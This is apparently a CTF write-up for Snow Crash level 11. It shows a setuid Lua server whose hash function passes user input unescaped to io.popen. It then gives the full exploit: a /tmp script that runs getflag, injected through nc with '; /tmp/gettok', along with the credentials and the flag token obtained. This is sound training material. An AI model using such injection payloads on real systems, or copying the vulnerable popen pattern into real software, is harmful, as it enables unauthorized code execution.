snow-crash/maiboyer/level11/README.md

# Level 11

## how to login

username: level11

password: feulo4b72j7edeahuete3no7c

## Goal

run `getflag` as user `flag11`

## Actually doing something


```bash
level11@SnowCrash:~$ ll
total 16
dr-xr-x---+ 1 level11 level11  120 Mar  5  2016 ./
d--x--x--x  1 root    users    340 Aug 30  2015 ../
-r-x------  1 level11 level11  220 Apr  3  2012 .bash_logout*
-r-x------  1 level11 level11 3518 Aug 30  2015 .bashrc*
-rwsr-sr-x  1 flag11  level11  668 Mar  5  2016 level11.lua*
-r-x------  1 level11 level11  675 Apr  3  2012 .profile*
```

a setuid script ? something seems fishy, lets open it

```lua
#!/usr/bin/env lua
local socket = require("socket")
local server = assert(socket.bind("127.0.0.1", 5151))

function hash(pass)
  prog = io.popen("echo "..pass.." | sha1sum", "r")
  data = prog:read("*all")
  prog:close()

  data = string.sub(data, 1, 40)

  return data
end


while 1 do
  local client = server:accept()
  client:send("Password: ")
  client:settimeout(60)
  local l, err = client:receive()
  if not err then
      print("trying " .. l)
      local h = hash(l)

      if h ~= "f05d1d066fb246efe0c6f7d095f909a7a0cf34a0" then
          client:send("Erf nope..\n");
      else
          client:send("Gz you dumb*\n")
      end

  end

  client:close()
end
```

it seems to be a server that ask for a password, check that the password is correct and does something ?

Lookit at the `hash` function, we do see a nice little shell injection oportunity, lets try something :D

we want to have something that write the getflag somewhere like we did before.

what about the same script:
```bash
level11@SnowCrash:~$ cat <<EOF >/tmp/gettok
#!/bin/sh
getflag >/tmp/flag
chmod 777 /tmp/flag
EOF
level11@SnowCrash:~$ chmod +x /tmp/gettok
level11@SnowCrash:~$ echo "; /tmp/gettok" | nc localhost 5151
Password: Erf nope..
level11@SnowCrash:~$ cat /tmp/flag
Check flag.Here is your token : fa6v5ateaw21peobuub8ipe6s
```

and voila :D